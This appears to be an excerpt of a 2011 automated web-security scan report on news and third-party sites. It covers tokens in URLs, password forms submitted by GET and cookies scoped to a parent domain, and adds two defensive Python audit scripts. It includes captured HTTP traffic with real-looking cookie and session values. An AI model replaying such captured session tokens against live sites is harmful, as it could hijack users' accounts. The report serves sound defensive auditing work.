GET /extern/login_status.php?api_key=c87f9494a93b2590633af39d1b8e347f&app_id=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1882bbf1%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f3d1bb8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df241ffe65%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3301b469%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17fe0c2e8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3301b469&origin=http%3A%2F%2Fwww.indianasnewscenter.com%2Ff208516ccc&relation=parent&transport=postmessage&frame=fa9baf21c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.109.105
X-Cnection: close
Date: Mon, 09 May 2011 13:59:09 GMT
Content-Length: 0


7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.indianasnewscenter.com
Path:   /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Issue detail

The response contains the following link that appears to contain a session token, in a script src attribute: http://www.apture.com/js/apture.js?siteToken=pgKiQTB

As in 7.3, the value is served to every visitor, so it is a site identifier rather than a session token.

Request

GET /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 13:49:37 GMT
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Date: Mon, 09 May 2011 13:59:02 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 71453

               
                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>

   
                                   At Noon: Casey A
...[SNIP]...
<body class="parentnews path-news-local article" id="entry-121488004">
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=pgKiQTB" charset="utf-8"></script>
...[SNIP]...

7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The response contains the following link that appears to contain a session token: http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent

The jsessionid is a Java servlet session identifier for the linked third-party site. The identical value is returned in the 404 page captured in 7.7 to a request that carried no cars.com cookie, so it appears to be a constant baked into the site template rather than anything tied to the visitor's own session. The concern is therefore not leakage of an orlandosentinel.com session but that every visitor who follows the link presents the same session identifier to cars.com, a session-fixation style issue for the linked site.

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...

7.7. http://www.orlandosentinel.com/business/transparent

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/transparent

Issue detail

The response contains the following link that appears to contain a session token: http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent

This is the same link, with the same jsessionid value, as in 7.6, here carried by the site's 404 error page; that it appears unchanged in an error template supports reading it as a hard-coded constant rather than a per-visitor token.

Request

GET /business/transparent HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Location: http://www.orlandosentinel.com/hive/error/notfound.jsp
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=180
Date: Mon, 09 May 2011 13:59:31 GMT
Connection: close
Content-Length: 130184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...

8. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
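Serving both section 6 (cleartext submission) and this section (GET submission), here is an added example, not the scanner's code and not any of the sites' code, that extracts password forms from a page, resolves each form's action against the page URL (a missing action means the page's own URL, a missing method means GET) and reports the same two conditions, plus two things the scanner does not: a form whose onsubmit returns false, which the browser never submits natively, and an HTTPS action on a page that was itself delivered over HTTP. The HTML fragments are constructed from the forms captured in 6.1, 6.3 and 6.5; the www.example.com form is a placeholder for a correctly configured login.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PasswordFormCollector(HTMLParser):
    """Collect every <form> that contains an <input type="password">."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "id": a.get("id") or a.get("name") or "",
                "action_attr": a.get("action"),                 # None when absent
                "method": (a.get("method") or "GET").upper(),   # HTML default is GET
                "onsubmit": a.get("onsubmit") or "",
                "password_fields": [],
            }
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(a.get("name") or a.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["password_fields"]:
                self.forms.append(self._current)
            self._current = None


def audit_password_forms(page_url, html):
    """Report, for each password form, the resolved action URL, method and findings."""
    collector = PasswordFormCollector()
    collector.feed(html)
    collector.close()
    page_scheme = urlsplit(page_url).scheme.lower()
    results = []
    for f in collector.forms:
        # No action attribute means the page's own URL; relative actions resolve against it.
        action = urljoin(page_url, f["action_attr"] or "")
        action_scheme = urlsplit(action).scheme.lower()
        findings = []
        if action_scheme == "http":
            findings.append("cleartext submission")
        if f["method"] == "GET":
            findings.append("password in query string (GET)")
        if "return false" in f["onsubmit"].lower():
            findings.append("native submit suppressed; inspect the script's request target")
        if action_scheme == "https" and page_scheme == "http":
            findings.append("login page delivered over cleartext; an active attacker can rewrite the form target")
        results.append({"form": f["id"], "action": action, "method": f["method"],
                        "password_fields": f["password_fields"], "findings": findings})
    return results


# Constructed fragments modelled on the forms captured in 6.1, 6.3 and 6.5; the last
# one is a placeholder for a correctly configured login on an HTTPS page.
SAMPLES = {
    "clash": (
        "http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown",
        '<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect"'
        ' method="post" id="user-login-form"><input type="password" name="pass" id="edit-pass" /></form>',
    ),
    "floridatoday": (
        "http://www.floridatoday.com/odygel/lib/userauth/content/login.html",
        '<form id="ody-login-form" onsubmit="return false">'
        '<input type="password" id="Password" name="Password" /></form>',
    ),
    "thevine": (
        "http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx",
        '<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" id="aspnetForm">'
        '<input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" /></form>',
    ),
    "hardened": (
        "https://www.example.com/login",
        '<form action="https://www.example.com/session" method="post" id="login">'
        '<input type="password" name="pass" /></form>',
    ),
}


def audit_samples():
    return {label: audit_password_forms(url, html)[0] for label, (url, html) in SAMPLES.items()}


if __name__ == "__main__":
    for label, r in audit_samples().items():
        print(label, r["method"], r["action"], r["password_fields"], r["findings"] or ["ok"])
```

The floridatoday sample shows why the two scanner findings in 6.3 and 8.1 need manual confirmation: with no action, no method and onsubmit="return false", the static analysis can only say what a native submit would do, not what the script does. The last check is the one to keep in mind when remediating: moving only the form's action to HTTPS leaves a login page that an on-path attacker can rewrite, so the page that carries the form must be served over TLS as well.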


8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form which would be submitted using the GET method: the form (id ody-login-form) has neither an action nor a method attribute, so a native submission would be a GET to http://www.floridatoday.com/odygel/lib/userauth/content/login.html with the fields in the query string. The form contains the following password field: Password

As noted in 6.3, the form's onsubmit="return false" prevents native submission, so the method that matters is the one used by the page's script; confirm by capturing the actual login request.

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...

8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form which would be submitted using the GET method: the form (id UAWidget-Registration) has neither an action nor a method attribute, so a native submission would be a GET to http://www.floridatoday.com/odygel/lib/userauth/content/signup.html with the fields in the query string. The form contains the following password fields: Password, ConfirmPassword

As noted in 6.4, the form's onsubmit="return false" prevents native submission, so the method that matters is the one used by the page's script; confirm by capturing the actual registration request.

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...

9. Cookie scoped to parent domain
There are 93 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, with no Domain attribute in the Set-Cookie header, a cookie is host-only: browsers return it only to the exact host that issued it, not to its subdomains. Omitting the attribute gives this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain and its other subdomains, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
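An added example, not part of the report, of checking Set-Cookie headers the way this section does: it parses each header, classifies the Domain attribute relative to the issuing host (host-only, self, parent or foreign), and notes missing HttpOnly or Secure on cookies whose names suggest a session. The three headers are the ones returned by api.twitter.com in 9.1, with the long _twitter_sess value shortened; the name fragments used to guess at session cookies are a heuristic of the example.

```python
def parse_set_cookie(header_value):
    """Split one Set-Cookie header into (name, value, attrs).

    Attribute names are lower-cased; valueless flags (Secure, HttpOnly) map to True.
    Splitting on ';' is safe because the one attribute that contains commas (Expires)
    never contains a semicolon.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        k, _, v = part.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return name.strip(), value.strip(), attrs


def domain_scope(issuing_host, domain_attr):
    """Classify a cookie's Domain attribute relative to the host that set it.

    host-only : no Domain attribute; returned only to the exact issuing host (the default)
    self      : Domain names the issuing host itself (also covers its own subdomains)
    parent    : Domain names a parent; every sibling subdomain can read and overwrite it
    foreign   : Domain is not a suffix of the host; browsers reject such cookies
    """
    if domain_attr in (None, True, ""):
        return "host-only"
    host = issuing_host.lower().rstrip(".")
    dom = domain_attr.lower().strip(".")
    if host == dom:
        return "self"
    if host.endswith("." + dom):
        return "parent"
    return "foreign"


SESSION_HINTS = ("sess", "sid", "token", "auth")  # name fragments; a heuristic, not a rule


def audit_set_cookies(issuing_host, set_cookie_headers):
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        scope = domain_scope(issuing_host, attrs.get("domain"))
        session_like = any(h in name.lower() for h in SESSION_HINTS)
        notes = []
        if scope == "parent":
            notes.append("scoped to parent domain %s" % attrs["domain"])
        if scope == "foreign":
            notes.append("Domain %s is not a parent of %s; browsers will drop it" % (attrs["domain"], issuing_host))
        if session_like and "httponly" not in attrs:
            notes.append("session-like cookie without HttpOnly")
        if session_like and "secure" not in attrs:
            notes.append("session-like cookie without Secure")
        findings.append({"name": name, "scope": scope, "session_like": session_like, "notes": notes})
    return findings


# The three Set-Cookie headers returned by api.twitter.com in 9.1 (_twitter_sess value shortened).
TWITTER_SET_COOKIES = [
    "k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com",
    "guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT",
    "_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwr...46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly",
]

if __name__ == "__main__":
    for f in audit_set_cookies("api.twitter.com", TWITTER_SET_COOKIES):
        print("%-14s %-10s %s" % (f["name"], f["scope"], "; ".join(f["notes"]) or "ok"))
```

On the 9.1 headers this reports k and _twitter_sess as parent-scoped (domain=.twitter.com from api.twitter.com) and guest_id as host-only, and it adds that _twitter_sess lacks the Secure flag, which is expected given the capture was over plain HTTP and is exactly what the remediation in section 6 calls for.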


9.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&1304949966734=cachebust HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.twitter.com

Response

HTTP/1.0 400 Bad Request
Date: Mon, 09 May 2011 14:07:38 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00679
Content-Type: application/json; charset=utf-8
Content-Length: 306
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304953175
Set-Cookie: k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA6sFdUvAToHaWQiJTI1NzM4ZGNiNzM3ZmRj%250AMWYyNzZmY2FhM2E1MTViMmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 09 May 2011 14:12:37 GMT
Connection: close

TWTR.Widget.receiveCallback_1({"request":"\/1\/statuses\/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&13049
...[SNIP]...

9.2. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850969&migRandom=143243442&migTagDesc=Cingular&migAtlSA=286738722&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B411066b5f02ce7a6%253B12fd50ec8f3%2C0%253B%253B%253B2504330642%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAA88gO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQCvugEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496061384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 14:00:16 GMT; domain=.mookie1.com
Set-Cookie: session=1304949616|1304949616; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
